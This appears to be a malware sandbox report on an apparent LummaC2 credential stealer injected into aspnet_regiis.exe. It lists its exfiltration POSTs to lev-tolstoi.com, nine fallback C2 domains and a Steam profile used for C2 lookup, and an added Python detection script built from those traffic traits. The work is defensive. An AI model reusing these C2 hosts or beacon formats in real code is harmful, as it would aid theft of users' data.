                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LYXP6LOCU8472NMT2QZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1284Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EZMLRP7PI78R7NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1110Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global traffic | DNS traffic detected: DNS query: ingreem-eilish.biz
                Source: global traffic | DNS traffic detected: DNS query: prisonyfork.buzz
                Source: global traffic | DNS traffic detected: DNS query: rebuildeso.buzz
                Source: global traffic | DNS traffic detected: DNS query: scentniej.buzz
                Source: global traffic | DNS traffic detected: DNS query: inherineau.buzz
                Source: global traffic | DNS traffic detected: DNS query: screwamusresz.buzz
                Source: global traffic | DNS traffic detected: DNS query: appliacnesot.buzz
                Source: global traffic | DNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global traffic | DNS traffic detected: DNS query: hummskitnj.buzz
                Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
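The request and DNS lines above carry the two network traits worth turning into detection logic: a `POST /api` with a hard-coded Chrome 119 User-Agent, `Connection: Keep-Alive`, no `Accept*` headers, and either a bare upper-case alphanumeric multipart boundary (the stolen-data upload, 20420 bytes here) or an 8-byte `application/x-www-form-urlencoded` body (the first check-in; the report shows only its size, and the short keyword body that documented LummaC2 samples send at this point is not in these lines), plus nine `.buzz`/`.biz` names resolved in a burst while only `lev-tolstoi.com` actually receives HTTP. The GET to a `steamcommunity.com` profile immediately before the POSTs matches the publicly documented LummaC2 practice of reading the live C2 host from a Steam profile; the report does not state that itself, so the code below treats the Steam host simply as a contacted host. The following is an added example by the editor, not part of the Joe Sandbox report: the sample requests and DNS list are constructed from the report's values, and the indicator threshold (`min_hits=4`) and the boundary length range are assumptions.

```python
"""Beacon and fallback-domain checks for the traffic listed above (added example)."""
import re
from dataclasses import dataclass, field

# Exact UA string from the report's requests. A real Chrome 119 sends it together
# with Accept, Accept-Encoding, Accept-Language and sec-ch-ua; the sample does not.
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
# Browser-generated boundaries look like ----WebKitFormBoundary<16 mixed chars>;
# the report shows bare upper-case alphanumerics of 14 to 19 characters
# (length range 10..24 is an assumption).
RANDOM_BOUNDARY = re.compile(r"^multipart/form-data; boundary=([A-Z0-9]{10,24})$")
BROWSER_HEADERS = {"accept", "accept-encoding", "accept-language"}


@dataclass
class HttpReq:
    method: str
    path: str
    headers: dict = field(default_factory=dict)

    @property
    def host(self) -> str:
        return self.headers.get("host", "")


def parse_request(raw: str) -> HttpReq:
    """Parse a CRLF-delimited HTTP request head (body ignored) into an HttpReq."""
    head, *_ = raw.split("\r\n\r\n", 1)
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpReq(method, path, headers)


def beacon_indicators(req: HttpReq) -> list[str]:
    """Names of the LummaC-style beacon traits the request exhibits."""
    hits = []
    if req.method == "POST" and req.path == "/api":
        hits.append("post_api")
    if req.headers.get("connection", "").lower() == "keep-alive":
        hits.append("keep_alive")
    if req.headers.get("user-agent") == CHROME_UA:
        hits.append("chrome119_ua")
    if BROWSER_HEADERS.isdisjoint(req.headers):
        hits.append("no_browser_headers")
    ctype = req.headers.get("content-type", "")
    if RANDOM_BOUNDARY.match(ctype):
        hits.append("random_boundary")        # upload of harvested data
    elif ctype == "application/x-www-form-urlencoded" and req.headers.get("content-length") == "8":
        hits.append("8byte_urlencoded")       # tiny first check-in
    return hits


def is_beacon(req: HttpReq, min_hits: int = 4) -> bool:
    hits = beacon_indicators(req)
    return "post_api" in hits and len(hits) >= min_hits


def failover_summary(dns_queries, contacted_hosts, min_unused=3):
    """Split resolved names into hosts that later carried HTTP and hosts that were
    only resolved. Many unused names beside one live host is the fallback-list
    rotation visible in the DNS lines above."""
    distinct = list(dict.fromkeys(dns_queries))          # dedupe, keep order
    live = [d for d in distinct if d in contacted_hosts]
    unused = [d for d in distinct if d not in contacted_hosts]
    tlds = {}
    for d in unused:
        tld = d.rsplit(".", 1)[-1]
        tlds[tld] = tlds.get(tld, 0) + 1
    return {"live": live, "unused": unused, "unused_tlds": tlds,
            "rotation_suspected": len(unused) >= min_unused and bool(live)}


# Constructed from the report's request and DNS lines; not a live capture.
REPORT_REQUESTS = [
    "POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    "Content-Type: multipart/form-data; boundary=VTE315RFUWUZY5\r\n"
    f"User-Agent: {CHROME_UA}\r\nContent-Length: 20420\r\nHost: lev-tolstoi.com\r\n\r\n",
    "POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"User-Agent: {CHROME_UA}\r\nContent-Length: 8\r\nHost: lev-tolstoi.com\r\n\r\n",
    "GET /profiles/76561199724331900 HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    f"User-Agent: {CHROME_UA}\r\nHost: steamcommunity.com\r\n\r\n",
]
REPORT_DNS = ["ingreem-eilish.biz", "prisonyfork.buzz", "rebuildeso.buzz",
              "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz",
              "appliacnesot.buzz", "cashfuzysao.buzz", "hummskitnj.buzz",
              "steamcommunity.com", "lev-tolstoi.com"]


def analyse(raw_requests=REPORT_REQUESTS, dns_queries=REPORT_DNS):
    reqs = [parse_request(r) for r in raw_requests]
    beacons = [f"{r.method} {r.host}{r.path}" for r in reqs if is_beacon(r)]
    contacted = {r.host for r in reqs}
    return {"beacons": beacons, **failover_summary(dns_queries, contacted)}


if __name__ == "__main__":
    print(analyse())
```

Run against the constructed input, both `lev-tolstoi.com` POSTs score five indicators and are flagged, the Steam GET scores three and is not, and the DNS summary reports two live hosts against nine resolved-but-never-contacted names (eight `.buzz`, one `.biz`). On real proxy or Zeek logs, feed the `http.log` request fields into `parse_request` equivalents and the `dns.log` query column into `failover_summary`; the boundary regex and the missing-`Accept` check are the parts least likely to collide with legitimate Chrome traffic.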
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1805624518.0000000004F2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appliacnesot.buzz:443/api
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: aspnet_regiis.exe, 00000002.00000003.1737561819.0000000004F39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737482318.0000000004F3B000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1737762408.0000000004F39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/?#
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1883574835.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866458834.0000000002A96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api
                Source: aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apiA
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apiQ0O0q
                Source: aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/api_q
                Source: aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/apil
                Source: aspnet_regiis.exe, 00000002.00000003.1883574835.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894288105.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866458834.0000000002A96000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com/pi
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/api
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/apiB
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/apiZ
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lev-tolstoi.com:443/apipi
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://prisonyfork.buzz:443/api
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/h
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1736958147.0000000002A8C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: aspnet_regiis.exe, 00000002.00000003.1714513192.0000000002A7F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
